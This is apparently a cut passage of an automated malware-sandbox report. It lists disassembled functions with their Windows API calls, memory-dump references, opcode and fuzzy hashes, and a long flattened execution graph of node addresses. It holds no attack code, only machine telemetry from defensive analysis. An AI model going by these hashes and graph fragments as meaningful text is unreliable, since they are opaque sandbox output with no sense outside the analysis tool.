                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-224404859
                                                          • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                          • Instruction ID: a8af4f0e04a9cb416ac945bb8770274a79718c16fb62e87aa8b604c5d62251ee
                                                          • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                          • Instruction Fuzzy Hash: D5D05EB24019209AD3126B08DC00DAF73A8EF5230074A48AAE841A6165D7B87D8186AC
                                                          Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                          Function 00405CD9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D01
                                                          • CharNextA.USER32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D12
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                          • Instruction ID: eb4b2eb4961b7d09ea4a34ed08b3b50e56f073c3670a6d3e208c08a45fec6953
                                                          • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                          • Instruction Fuzzy Hash: 10F0F631204918FFD7029FA4DD0499FBBA8EF16350B2580BAE840FB211D674DE01AB98

                                                          Execution Graph

                                                          Execution Coverage:0%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:77.9%
                                                          Total number of Nodes:1499
                                                          Total number of Limit Nodes:8
                                                          execution_graph 20412 35969090 20413 359690ca 20412->20413 20414 359690eb RtlDebugPrintTimes 20413->20414 20415 359694fb 20413->20415 20417 35969108 20414->20417 20416 35969150 RtlDebugPrintTimes 20416->20417 20417->20415 20417->20416 20418 3595909c 20419 359590dd GetPEB 20418->20419 20420 359590cd 20418->20420 20421 359590f0 20419->20421 20420->20419 20420->20421 20422 359c5090 20423 359c50d0 20422->20423 20429 359c5172 20422->20429 20428 359c5118 20423->20428 20430 359c35ef 20423->20430 20425 359c50f3 20426 35945020 2 API calls 20425->20426 20425->20429 20426->20428 20428->20429 20434 3591d796 20428->20434 20432 359c362c 20430->20432 20431 359c36ae 20431->20425 20432->20431 20433 35945020 2 API calls 20432->20433 20433->20431 20435 3591d7a7 20434->20435 20436 3591d7b5 20434->20436 20435->20436 20438 359fb73c GetPEB 20435->20438 20436->20429 20441 359fb786 20438->20441 20439 359fb9cc 20439->20436 20440 359fb9bb GetPEB 20440->20439 20442 359fb988 20441->20442 20443 359fb848 GetPEB 20441->20443 20442->20439 20442->20440 20445 359fb86d 20443->20445 20444 359fb977 GetPEB 20444->20442 20445->20442 20445->20444 20999 3597739a 21000 359773c0 20999->21000 21001 35977449 20999->21001 21001->21000 21002 359776cc 21001->21002 21003 359776bc GetPEB 21001->21003 21002->21000 21004 359776d8 GetPEB 21002->21004 21003->21002 21004->21000 21005 359776e6 21004->21005 21007 359df6c7 21005->21007 21008 359df6f3 21007->21008 21009 359df6f7 GetPEB 21008->21009 21010 359df707 21008->21010 21009->21010 21010->21000 19984 359ab594 19985 359ab5bb 19984->19985 19988 359ab610 GetPEB 19985->19988 19989 359ab62b 19985->19989 19986 359ab6b3 GetPEB 19987 359ab6c3 19986->19987 19988->19989 19989->19986 19989->19987 19990 3599f196 19991 3599f19e RtlDebugPrintTimes 19990->19991 19992 3599f1b2 19990->19992 19991->19992 20446 3591b480 20447 3591b49a 20446->20447 20449 3591b4b7 20447->20449 20450 3591b534 20447->20450 20448 3591b55e 20452 3591b514 20449->20452 20453 3591b4f0 RtlDebugPrintTimes 20449->20453 20454 3597cf4c GetPEB 20449->20454 20450->20448 20456 3591b562 20450->20456 20453->20452 20455 3597cf67 20454->20455 20457 3591b57f GetPEB 20456->20457 20459 3591b56d 20456->20459 20458 3591b590 20457->20458 20458->20448 20459->20457 21356 3591b680 21359 35923616 21356->21359 21358 3591b698 21361 35923632 21359->21361 21362 35923686 21359->21362 21360 35923699 RtlDebugPrintTimes 21365 359236a9 21360->21365 21361->21362 21363 35923672 21361->21363 21364 3592365e GetPEB 21361->21364 21362->21360 21363->21358 21364->21362 21364->21363 21365->21363 21366 359236f6 GetPEB 21365->21366 21366->21363 21367 359a368c 21368 359a36c1 21367->21368 21375 359a36ba 21367->21375 21369 359a374b GetPEB 21368->21369 21370 359a370b 21368->21370 21372 359a381a 21368->21372 21373 359a37aa GetPEB 21368->21373 21368->21375 21369->21368 21369->21375 21371 359a3809 GetPEB 21370->21371 21370->21372 21371->21372 21374 359a387a GetPEB 21372->21374 21372->21375 21373->21368 21374->21375 20460 359ad080 20462 359ad0a3 20460->20462 20466 359ad095 20460->20466 20461 359ad124 20462->20461 20463 359ad0fb GetPEB 20462->20463 20464 359ad10c GetPEB 20462->20464 20465 35933ca0 20463->20465 20464->20466 20465->20464 20467 3591d08d 20468 3591d0bc 20467->20468 20477 3591d196 20467->20477 20470 3591d796 4 API calls 20468->20470 20468->20477 20478 3591d12a 20468->20478 20470->20478 20471 3597a79b 20475 3591d13b 20471->20475 20471->20477 20489 359db1e1 20471->20489 20472 3597a843 GetPEB 20473 3591d227 20472->20473 20476 359db256 4 API calls 20475->20476 20475->20477 20476->20477 20477->20472 20477->20473 20478->20475 20478->20477 20479 359db256 20478->20479 20482 359db27f 20479->20482 20488 359db2fd 20479->20488 20480 359db2df 20480->20471 20481 359db3a3 GetPEB 20481->20480 20482->20488 20493 3591d6aa 20482->20493 20484 359db2b2 20484->20480 20485 359db2c6 GetPEB 20484->20485 20486 359db2d9 20485->20486 20486->20480 20487 3591d6aa 2 API calls 20486->20487 20487->20488 20488->20480 20488->20481 20490 359db200 20489->20490 20492 359db22c 20489->20492 20491 3591d6aa 2 API calls 20490->20491 20490->20492 20491->20492 20492->20475 20494 3591d6c7 20493->20494 20495 3591d6e1 GetPEB 20494->20495 20496 3591d777 20494->20496 20498 3591d6f2 20495->20498 20496->20484 20497 3591d766 GetPEB 20497->20496 20498->20496 20498->20497 19993 359d5180 19994 359d51a5 19993->19994 19997 359d528e 19993->19997 19995 359d5269 GetPEB 19994->19995 19994->19997 19996 359d5274 GetPEB 19995->19996 19995->19997 19996->19997 21015 359c1383 21018 359c13b9 21015->21018 21017 359c1391 21020 359c13d5 21018->21020 21019 359c143c 21019->21017 21020->21019 21021 359c144e GetPEB 21020->21021 21022 359c1460 21021->21022 21022->21019 21023 359c14bf GetPEB 21022->21023 21024 359c1489 GetPEB 21022->21024 21023->21019 21025 359c149b 21024->21025 21025->21023 20499 359174b0 20500 359174bc 20499->20500 20501 3597aeb1 RtlDebugPrintTimes 20500->20501 20502 359174ed 20500->20502 20504 3597ae4a 20500->20504 20505 35917537 20501->20505 20512 359176b2 20502->20512 20504->20501 20508 3597af3c GetPEB 20505->20508 20509 35917557 20505->20509 20506 359174fb 20506->20505 20519 3591758f 20506->20519 20511 3597af4f GetPEB 20508->20511 20510 35917565 20509->20510 20509->20511 20511->20510 20513 359176c8 20512->20513 20514 3597affa GetPEB 20512->20514 20513->20506 20515 3597b006 GetPEB 20514->20515 20516 3597b020 20514->20516 20515->20516 20517 3597b056 GetPEB 20516->20517 20518 3597b063 20517->20518 20520 3597af8f GetPEB 20519->20520 20526 359175a5 20519->20526 20521 3597af9b GetPEB 20520->20521 20522 3597afb5 20520->20522 20521->20522 20523 3597afd5 GetPEB 20522->20523 20524 3597afe4 20523->20524 20525 35917676 20525->20505 20526->20520 20526->20525 20527 359170b0 20530 359170e0 20527->20530 20533 3591710d 20530->20533 20534 35917120 20533->20534 20536 359170ca 20533->20536 20535 35917129 RtlDebugPrintTimes 20534->20535 20534->20536 20535->20534 21026 359c57bd 21027 359c57e4 21026->21027 21028 3591d796 4 API calls 21027->21028 21029 359c5861 21027->21029 21028->21029 19998 3593b1b0 19999 3593b1cd 19998->19999 20000 3593b1ef GetPEB 19999->20000 20001 3593b212 19999->20001 20000->20001 20002 3594f5b0 20003 3594f5fc 20002->20003 20004 359901b4 GetPEB 20003->20004 20005 359901c7 GetPEB 20003->20005 20007 3599021a GetPEB 20003->20007 20008 3599029a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@ 20003->20008 20009 3594f762 20003->20009 20004->20005 20005->20003 20006 359901da GetPEB 20005->20006 20006->20003 20007->20003 20008->20003 20010 3599033c GetPEB 20009->20010 20015 3594f775 20009->20015 20011 3599036c 20010->20011 20012 35990357 20010->20012 20014 3599037a GetPEB 20011->20014 20011->20015 20012->20011 20013 3599035c GetPEB 20012->20013 20013->20011 20014->20015 20016 3599038d GetPEB 20014->20016 20016->20015 20017 3599039a 20016->20017 20017->20015 20018 3599039f GetPEB 20017->20018 20018->20015 20019 359571b0 20022 35957208 20019->20022 20021 359571c4 20023 35994546 20022->20023 20025 35957218 20022->20025 20024 3599454c GetPEB 20023->20024 20026 3599455b 20023->20026 20024->20026 20025->20023 20027 35957232 GetPEB 20025->20027 20027->20023 20028 35957245 20027->20028 20028->20021 20029 3595b1bd 20030 3595b1f7 20029->20030 20032 3595b266 20030->20032 20035 35996f5d 20030->20035 20036 3595b252 20030->20036 20031 359970fe RtlDebugPrintTimes 20033 35997116 20031->20033 20033->20033 20034 35996fc6 RtlDebugPrintTimes 20034->20035 20035->20032 20035->20034 20036->20031 20036->20032 21030 359f37b6 21031 359f37da 21030->21031 21032 359f37c9 GetPEB 21030->21032 21032->21031 20037 359bd5b0 20038 359bd5d3 20037->20038 20040 359bd5c8 20037->20040 20039 359bd5f7 GetPEB 20039->20040 20040->20038 20040->20039 20041 359bd61f 20040->20041 20042 359bd63f GetPEB 20041->20042 20042->20038 21033 359dd7b0 21034 359dd7c9 GetPEB 21033->21034 21035 359dd7dc 21033->21035 21034->21035 21036 359dd842 GetPEB 21035->21036 21037 359dd7e2 21035->21037 21036->21037 20043 359f31b0 20046 359f31e1 20043->20046 20045 359f31dd 20047 359f31f0 20046->20047 20048 359f322b 20047->20048 20049 359f327c GetPEB 20047->20049 20050 359f3292 20047->20050 20048->20045 20049->20050 20050->20048 20052 359f35b6 20050->20052 20053 359f35d0 20052->20053 20054 359f35c0 GetPEB 20052->20054 20053->20048 20054->20053 20541 359190a0 20543 359190b8 20541->20543 20542 359190f5 20546 35919118 20542->20546 20553 35919148 20542->20553 20543->20542 20543->20546 20547 35919240 20543->20547 20548 3597bb27 GetPEB 20547->20548 20549 3591927c 20547->20549 20550 3597bb47 20548->20550 20549->20542 20551 3597bb84 GetPEB 20550->20551 20552 3597bb95 20550->20552 20551->20552 20554 359191d1 20553->20554 20555 35919165 20553->20555 20554->20546 20555->20554 20556 3597bac1 GetPEB 20555->20556 20558 3597ba84 GetPEB 20555->20558 20556->20554 20557 3597bacd GetPEB 20556->20557 20557->20554 20558->20554 20559 3597ba90 GetPEB 20558->20559 20559->20554 21038 359a97a9 GetPEB 21039 359a97ca 21038->21039 21380 359352a0 21381 3593531e 21380->21381 21383 359353e6 21381->21383 21386 3593567f 21381->21386 21387 359355e8 21381->21387 21382 35935479 GetPEB 21390 3593548d 21382->21390 21383->21382 21384 35986d10 GetPEB 21383->21384 21383->21390 21385 35986d24 21384->21385 21385->21382 21386->21387 21388 3595329e 2 API calls 21386->21388 21388->21386 21389 359355d7 GetPEB 21389->21387 21390->21387 21390->21389 21391 35986dca GetPEB 21390->21391 21392 35986ddb 21391->21392 21392->21389 21040 359af7af 21041 359af8da 21040->21041 21045 359af7d2 21040->21045 21042 359af8b6 21042->21041 21044 359af8be GetPEB 21042->21044 21043 359af8a5 GetPEB 21043->21042 21048 359af8d4 21044->21048 21045->21041 21045->21042 21045->21043 21046 359af894 GetPEB 21045->21046 21047 35933ca0 21046->21047 21047->21043 21048->21041 21049 359af962 GetPEB 21048->21049 21050 359af921 GetPEB 21048->21050 21049->21041 21051 359af935 21050->21051 21051->21049 21052 359533a0 21055 359533b7 21052->21055 21059 35953450 21052->21059 21053 35953446 21054 35992a30 GetPEB 21053->21054 21053->21059 21054->21059 21055->21053 21056 359533fb GetPEB 21055->21056 21055->21059 21057 35953412 21056->21057 21057->21059 21060 359534b0 21057->21060 21061 359534ca 21060->21061 21063 359534dd 21060->21063 21062 35992a5f GetPEB 21061->21062 21061->21063 21062->21063 21063->21053 20055 359cb1a0 20058 359cb1b7 20055->20058 20057 359cb1b3 20060 359cb1ea 20058->20060 20059 359cb20b 20059->20057 20060->20059 20063 359cb252 20060->20063 20064 3595d290 20060->20064 20061 3595d290 ___swprintf_l 20061->20059 20063->20059 20063->20061 20067 3595d2a3 20064->20067 20065 3595d310 20065->20063 20066 3595d2bb ___swprintf_l 20066->20065 20067->20065 20067->20066 21064 3593f3d0 21065 3593f3dc 21064->21065 21068 3593f460 21065->21068 21067 3593f3fc 21069 3593f479 21068->21069 21070 3593f5f7 21069->21070 21071 3593f6a6 21069->21071 21072 359795e1 GetPEB 21070->21072 21073 3593f5ff 21070->21073 21074 35979641 GetPEB 21071->21074 21075 3593f6ae 21071->21075 21076 359795f4 GetPEB 21072->21076 21073->21076 21081 3593f60d 21073->21081 21078 35979654 GetPEB 21074->21078 21075->21078 21075->21081 21077 35979607 21076->21077 21076->21081 21080 35979610 GetPEB 21077->21080 21077->21081 21079 35979667 21078->21079 21078->21081 21079->21081 21082 35979670 GetPEB 21079->21082 21080->21081 21081->21067 21082->21081 21393 359c36d9 21394 359c36ed 21393->21394 21396 359c3736 21394->21396 21397 359db3d0 21394->21397 21398 359db3dc 21397->21398 21399 359db3e3 21397->21399 21398->21396 21400 359db3f0 GetPEB 21399->21400 21400->21398 20068 359f35d7 20070 359f35f9 20068->20070 20069 359f361f GetPEB 20071 359f3633 20069->20071 20070->20069 20074 359f36df 20070->20074 20072 359f3653 GetPEB 20071->20072 20075 359f367b 20071->20075 20072->20075 20073 359f3701 GetPEB 20073->20075 20074->20073 20074->20075 20076 3599d5d0 20077 3599d5e7 20076->20077 20078 3599d5ee 20077->20078 20080 3599d611 20077->20080 20087 35953274 20078->20087 20081 3599d691 GetPEB 20080->20081 20086 3599d5f5 20080->20086 20082 3599d6b6 20081->20082 20083 35953274 2 API calls 20082->20083 20084 3599d759 20082->20084 20082->20086 20083->20082 20085 3599d772 GetPEB 20084->20085 20085->20086 20088 35953289 20087->20088 20089 35953297 20088->20089 20091 3595329e 20088->20091 20089->20086 20094 359532d4 20091->20094 20092 3595332c GetPEB 20093 3595333f 20092->20093 20093->20089 20094->20092 20094->20093 20095 359929e4 GetPEB 20094->20095 20096 359929f4 20095->20096 20096->20092 20097 3599f1d6 20101 3599f1e2 20097->20101 20098 3599f3d6 20099 3599f262 RtlDebugPrintTimes 20100 3599f275 RtlDebugPrintTimes 20099->20100 20100->20101 20101->20098 20101->20099 20101->20100 20102 3599f373 RtlDebugPrintTimes 20101->20102 20104 3599f30c RtlDebugPrintTimes 20101->20104 20105 3599f3ab 20101->20105 20102->20101 20104->20101 20106 3599f3c6 20105->20106 20107 3599f3b3 RtlDebugPrintTimes 20105->20107 20106->20101 20107->20106 20560 359490db GetPEB 20561 35949125 20560->20561 20563 35949253 20561->20563 20564 35949274 GetPEB 20561->20564 20565 359492d0 20564->20565 20565->20563 21401 3591b2c0 21404 3591b2d3 21401->21404 21403 3591b2cf 21406 3591b2f9 21404->21406 21405 3591b3c2 21405->21403 21406->21405 21407 3591b352 GetPEB 21406->21407 21408 3591b365 21406->21408 21407->21408 21409 3591b376 GetPEB 21408->21409 21412 3591b39e 21408->21412 21410 3591b389 21409->21410 21411 3591b395 GetPEB 21410->21411 21410->21412 21411->21412 21412->21403 21083 359257c0 21084 359257d7 21083->21084 21085 359257e4 21084->21085 21086 35980891 GetPEB 21084->21086 21087 359808a4 21085->21087 21102 35927152 21085->21102 21086->21087 21090 359808bc GetPEB 21087->21090 21089 35925860 21093 359808cf 21090->21093 21091 359257fb 21091->21089 21091->21090 21092 3592580c 21091->21092 21092->21093 21094 35925817 21092->21094 21118 359f50d9 21093->21118 21096 35925829 RtlDebugPrintTimes 21094->21096 21098 3592584a 21096->21098 21097 359808e7 GetPEB 21099 35925857 21097->21099 21098->21097 21098->21099 21099->21089 21122 359f5152 21099->21122 21101 3598090f 21101->21101 21103 35927175 21102->21103 21104 359271ca 21103->21104 21107 35927202 21103->21107 21108 359817a5 GetPEB 21103->21108 21115 359817e6 RtlDebugPrintTimes 21104->21115 21117 359271d0 21104->21117 21105 359817fb 21109 35981812 21105->21109 21110 35981802 RtlDebugPrintTimes 21105->21110 21106 359271da 21126 359270e7 21106->21126 21114 35927211 21107->21114 21131 359f5060 21107->21131 21108->21107 21110->21109 21112 359271e4 21112->21091 21114->21104 21116 359817d1 RtlDebugPrintTimes 21114->21116 21115->21117 21116->21104 21117->21105 21117->21106 21119 359f5114 21118->21119 21120 359f5118 GetPEB 21119->21120 21121 359f5128 21119->21121 21120->21121 21121->21098 21123 359f518d 21122->21123 21124 359f5191 GetPEB 21123->21124 21125 359f51a1 21123->21125 21124->21125 21125->21101 21127 359270fd 21126->21127 21128 3592711b 21127->21128 21135 3594f2d0 21127->21135 21128->21112 21130 35979193 21130->21130 21132 359f509b 21131->21132 21133 359f509f GetPEB 21132->21133 21134 359f50af 21132->21134 21133->21134 21134->21114 21136 3594f2ff 21135->21136 21137 35990068 GetPEB 21136->21137 21138 3594f30c 21136->21138 21137->21138 21139 3599009b GetPEB 21138->21139 21140 3594f317 21138->21140 21139->21140 21140->21130 21413 359e16cc 21418 359e16df 21413->21418 21414 359e1d51 21415 359e1753 GetPEB 21415->21418 21416 359e176d GetPEB 21416->21418 21418->21414 21418->21415 21418->21416 21419 359e1c33 GetPEB 21418->21419 21420 359e1c4d GetPEB 21418->21420 21421 359df2f8 21418->21421 21419->21418 21420->21418 21422 359df32c 21421->21422 21423 359df330 GetPEB 21422->21423 21424 359df340 21422->21424 21423->21424 21424->21418 20566 359370c0 20568 3593713a 20566->20568 20567 35937184 20568->20567 20569 359371aa 20568->20569 20573 35937143 20568->20573 20630 359cf525 20569->20630 20571 35937221 GetPEB 20574 35937230 20571->20574 20572 359371b0 20573->20571 20573->20574 20575 359372dd 20574->20575 20577 35938abf 20574->20577 20615 3593725e 20574->20615 20588 35937669 20575->20588 20593 35937423 20575->20593 20576 35938d3f GetPEB 20580 35938d77 20576->20580 20582 35938b8d 20577->20582 20583 35938b7d GetPEB 20577->20583 20577->20615 20579 359375b7 20581 359375bb 20579->20581 20585 3593761c 20579->20585 20672 3591f172 20581->20672 20586 35938b97 GetPEB 20582->20586 20587 35938bb5 20582->20587 20583->20582 20589 35937c4f GetPEB 20585->20589 20619 35937caf 20585->20619 20586->20587 20590 35938ba6 20586->20590 20594 35938bce 20587->20594 20595 35938bbe GetPEB 20587->20595 20596 35937b33 20588->20596 20618 3593793f 20588->20618 20591 35937c5c GetPEB 20589->20591 20601 35937c77 20589->20601 20721 359df453 20590->20721 20591->20601 20593->20585 20593->20615 20650 3591f626 20593->20650 20598 35938bd8 GetPEB 20594->20598 20611 35938c00 20594->20611 20595->20594 20596->20585 20599 3591f626 10 API calls 20596->20599 20596->20615 20597 3591f626 10 API calls 20600 35937aa4 20597->20600 20602 35938be7 20598->20602 20598->20611 20603 35937bd4 20599->20603 20600->20585 20604 35937aa8 20600->20604 20605 35937ca0 GetPEB 20601->20605 20602->20611 20612 35938bf0 GetPEB 20602->20612 20603->20585 20606 35937bd8 20603->20606 20607 3591f172 31 API calls 20604->20607 20605->20619 20610 3591f172 31 API calls 20606->20610 20607->20615 20608 35938a27 GetPEB 20608->20615 20609 35938c26 GetPEB 20616 35938c36 20609->20616 20610->20615 20611->20609 20611->20616 20612->20611 20613 359389e7 GetPEB 20613->20615 20614 3593898d 20614->20613 20615->20576 20615->20580 20620 35938c59 20616->20620 20621 35938c49 GetPEB 20616->20621 20617 35938c90 GetPEB 20617->20615 20618->20585 20618->20597 20618->20615 20619->20615 20622 3591f626 10 API calls 20619->20622 20623 359385f7 20619->20623 20624 3591f172 31 API calls 20619->20624 20626 35937d3c 20619->20626 20620->20617 20621->20620 20622->20619 20625 35938652 GetPEB 20623->20625 20623->20626 20624->20619 20627 3593865f GetPEB 20625->20627 20628 3593867a 20625->20628 20626->20608 20626->20614 20626->20615 20627->20628 20629 359386a0 GetPEB 20628->20629 20629->20626 20631 359cf531 20630->20631 20632 359cf549 RtlDebugPrintTimes 20631->20632 20633 359cf563 20631->20633 20635 359cf55e 20632->20635 20634 359176b2 3 API calls 20633->20634 20636 359cf579 20634->20636 20635->20572 20636->20635 20637 359cf7d0 GetPEB 20636->20637 20639 359cf5d3 20636->20639 20637->20635 20638 359cf7db GetPEB 20637->20638 20638->20635 20725 359d11a4 20639->20725 20641 359cf614 20641->20635 20642 359cf6c1 GetPEB 20641->20642 20643 359cf73e 20642->20643 20644 359cf6d2 20642->20644 20643->20635 20646 359cf779 GetPEB 20643->20646 20645 359cf6d7 GetPEB 20644->20645 20649 359cf6f1 20644->20649 20645->20649 20647 359cf784 GetPEB 20646->20647 20646->20649 20647->20649 20648 359cf715 GetPEB 20648->20635 20649->20648 20654 3591f647 20650->20654 20651 3597e3d3 20652 3597e3d8 GetPEB 20651->20652 20653 3597e3ee GetPEB 20652->20653 20671 3591f701 20652->20671 20653->20671 20654->20651 20654->20652 20655 3591f69f 20654->20655 20656 3597e451 GetPEB 20655->20656 20657 3591f6b1 20655->20657 20658 3597e464 GetPEB 20656->20658 20657->20658 20659 3591f6bc 20657->20659 20658->20659 20660 3597e477 20658->20660 20662 3591f6d9 20659->20662 20663 3597e48d GetPEB 20659->20663 20661 359df453 GetPEB 20660->20661 20661->20659 20664 3597e4a0 GetPEB 20662->20664 20668 3591f6e4 20662->20668 20663->20664 20665 3597e4b3 20664->20665 20664->20668 20667 3597e4bc GetPEB 20665->20667 20665->20668 20666 3597e4ea GetPEB 20669 3591f6f6 20666->20669 20667->20668 20668->20666 20668->20669 20670 3597e506 GetPEB 20669->20670 20669->20671 20670->20671 20671->20579 20673 3591f1a0 20672->20673 20678 3591f261 20672->20678 20677 3591f1ff 20673->20677 20673->20678 20713 3591f226 20673->20713 20674 3591f50a 20676 3597df3b GetPEB 20674->20676 20684 3591f517 20674->20684 20675 3597e217 GetPEB 20680 3597e22a GetPEB 20675->20680 20679 3597df47 GetPEB 20676->20679 20676->20684 20677->20713 20733 3591f720 20677->20733 20678->20674 20690 3591f306 20678->20690 20696 3591f3b1 20678->20696 20679->20684 20682 3597e23f 20680->20682 20687 3591f3a1 20680->20687 20685 359df5be GetPEB 20682->20685 20683 3597e375 GetPEB 20686 3597e381 GetPEB 20683->20686 20683->20713 20688 3591f546 20684->20688 20708 3591f40d 20684->20708 20685->20687 20686->20713 20689 3597e25e GetPEB 20687->20689 20687->20696 20692 3591f573 20688->20692 20693 3597dfe8 GetPEB 20688->20693 20688->20713 20691 3597e269 GetPEB 20689->20691 20689->20696 20690->20675 20690->20687 20694 3591f393 20690->20694 20690->20708 20690->20713 20691->20696 20695 3597dffb GetPEB 20692->20695 20704 3591f57e 20692->20704 20693->20695 20694->20680 20694->20687 20697 3597e00e 20695->20697 20695->20704 20698 3591f3f0 20696->20698 20699 3597e2d5 GetPEB 20696->20699 20737 359df5be 20697->20737 20701 3597e2e8 GetPEB 20698->20701 20707 3591f3fb 20698->20707 20699->20701 20702 3597e2fd 20701->20702 20701->20707 20706 3597e306 GetPEB 20702->20706 20702->20707 20703 3597e336 GetPEB 20703->20708 20705 3597e080 GetPEB 20704->20705 20718 3591f5e7 20704->20718 20709 3597e08b GetPEB 20705->20709 20705->20718 20706->20707 20707->20703 20707->20708 20708->20683 20708->20713 20709->20718 20710 3591f5f4 20712 3597e152 GetPEB 20710->20712 20717 3591f5ff 20710->20717 20711 3597e13f GetPEB 20711->20712 20714 3597e167 20712->20714 20712->20717 20713->20615 20716 3597e170 GetPEB 20714->20716 20714->20717 20715 3597e1a6 GetPEB 20719 3591f616 20715->20719 20716->20717 20717->20715 20717->20719 20718->20710 20718->20711 20719->20713 20720 3597e1bf GetPEB 20719->20720 20720->20713 20722 359df478 20721->20722 20723 359df49f GetPEB 20722->20723 20724 359df4af 20722->20724 20723->20724 20724->20587 20726 359d11bc 20725->20726 20732 359d1299 20725->20732 20727 359d1221 GetPEB 20726->20727 20726->20732 20728 359d122d GetPEB 20727->20728 20729 359d1247 20727->20729 20728->20729 20730 359d129b GetPEB 20729->20730 20729->20732 20731 359d12a7 GetPEB 20730->20731 20730->20732 20731->20732 20732->20641 20735 3591f739 20733->20735 20734 3591f79d 20734->20713 20735->20734 20741 3591f7ba 20735->20741 20738 359df5e3 20737->20738 20739 359df61a 20738->20739 20740 359df60a GetPEB 20738->20740 20739->20704 20740->20739 20743 3591f7e1 20741->20743 20742 3597e5a5 GetPEB 20744 3597e5b8 GetPEB 20742->20744 20743->20742 20746 3597e68a GetPEB 20743->20746 20752 3591f837 20743->20752 20756 3591f892 20743->20756 20745 3597e5cb 20744->20745 20749 3591f842 20744->20749 20747 359df5be GetPEB 20745->20747 20748 3597e696 GetPEB 20746->20748 20746->20756 20747->20749 20748->20756 20750 3597e5df GetPEB 20749->20750 20751 3591f86a 20749->20751 20753 3597e5f2 GetPEB 20750->20753 20751->20753 20758 3591f875 20751->20758 20752->20744 20752->20749 20754 3597e605 20753->20754 20753->20758 20757 3597e60e GetPEB 20754->20757 20754->20758 20755 3597e63e GetPEB 20759 3591f887 20755->20759 20756->20735 20757->20758 20758->20755 20758->20759 20759->20756 20760 3597e65a GetPEB 20759->20760 20761 3597e669 20759->20761 20760->20761 20761->20746 21141 359e77ca 21143 359e77eb 21141->21143 21142 359e791f 21143->21142 21144 359e78c7 RtlDebugPrintTimes 21143->21144 21144->21143 20112 359555c0 20113 359555d2 20112->20113 20114 359555d9 20112->20114 20114->20113 20115 3599391a GetPEB 20114->20115 20116 3599392b 20115->20116 20762 3595b4c0 20765 3595b4db 20762->20765 20763 3595b4f5 20764 3599727c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@ 20764->20765 20765->20763 20765->20764 21425 359292c5 21426 359292fd 21425->21426 21427 